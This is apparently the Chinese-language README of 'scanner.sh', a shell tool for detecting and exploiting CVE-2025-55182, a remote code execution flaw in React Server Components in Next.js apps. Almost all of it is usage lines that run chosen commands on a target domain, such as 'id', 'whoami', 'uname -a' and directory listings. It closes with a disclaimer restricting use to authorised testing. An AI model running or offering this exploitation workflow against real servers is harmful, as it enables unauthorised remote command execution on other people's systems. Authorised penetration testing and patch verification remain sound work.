用于检测和利用 Next.js 应用中 CVE-2025-55182(React 服务端组件远程代码执行)的简易命令行工具。

chmod +x scanner.sh
# 使用默认命令(id)扫描
./scanner.sh -d example.com
# 执行自定义命令
./scanner.sh -d example.com -c "whoami"
# 使用完整 URL
./scanner.sh -d https://example.com -c "uname -a"
-d, --domain - 目标域名/URL(必需)-c, --command - 要执行的命令(默认:id)# 检查目标是否存在漏洞
./scanner.sh -d vulnerable-app.com
# 获取系统信息
./scanner.sh -d vulnerable-app.com -c "uname -a"
# 列出文件
./scanner.sh -d vulnerable-app.com -c "ls -la /tmp"
此工具仅用于教育和授权的安全测试目的。请勿对你不拥有或未获得测试许可的系统使用。